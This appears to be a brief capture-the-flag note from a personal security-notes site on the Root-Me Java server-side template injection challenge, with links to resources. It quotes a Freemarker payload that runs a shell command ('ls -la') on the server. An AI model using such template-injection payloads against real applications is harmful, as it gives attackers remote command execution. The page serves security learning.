Skip to content
logo
Red tradecraft
Java: Server-side Template Injection (SSTI)
  • Privacy greenhouse
  • Defence blues
  • Purple crossroads
  • Indigo observatory
  • Contact
Initializing search
    • An adversary mind map, one of many
    • The grounds
    • Ankh-Morpork: the city leaves a footprint
    • Fungolia earthworks
    • Unseen University Power & Light Co.
    • The Scarlet Semaphore
    • TryHackMe rooms
    • Root-Me challenges
      • Boars in the API undergrowth
      • Rooting around in memory
      • Picking the locks of ciphers
      • Where a script hands over the keys
      • Rhizomatic sprawl: the network underworld
      • Prising binaries open
      • Secrets buried in pixels
      • Foraging in the web orchard
        • Root-Me Web client challenges
        • Root-Me Web server challenges
          • Insecure code management
          • Directory traversal
          • File upload: null byte
          • PHP assert()
          • PHP Filters
          • PHP Register globals
          • JWT Introduction
          • JWT (not) revoked token
          • JWT weak secret
          • Python: Server-side Template Injection Introduction
          • Command injection: filter bypass
          • Java: Server-side Template Injection (SSTI)
            • Resources
            • Techniques
          • Local file inclusion
          • Local file inclusion: double encoding
          • PHP preg_replace
          • PHP type juggling
          • SQL injection: authentication
          • SQL injection: string
          • XSLT code execution
          • PHP path truncation
          • PHP serialisation
          • SQL injection: numeric
          • SQL injection: routed
          • SQL truncation
          • XPath injection: authentication
          • SQL injection: time-based
    • RIPE NCC Academy labs
    • Resources
    • Techniques

    Java: Server-side Template Injection (SSTI)¶

    root-me challenge: Java - Server-side Template Injection: Exploit the vulnerability in order to retrieve the validation password in the file SECRET_FLAG.txt.


    PayLoadAllTheThings Freemarker code execution

    ${"freemarker.template.utility.Execute"?new()("ls -la")}
    

    etcetera.

    Resources¶

    • Server-Side Template Injection RCE For The Modern Web App - BlackHat 15

    Techniques¶

    • Template injection (SSTI)

    • Server-side injection runbook

    2026-07-30 17:57
    © Copyright 2025, TyMyrddin.
    Created using Sphinx 7.2.6. and Sphinx-Immaterial

    Made with love by Ty Myrddin, 2026, with a forest garden fostered by /ut7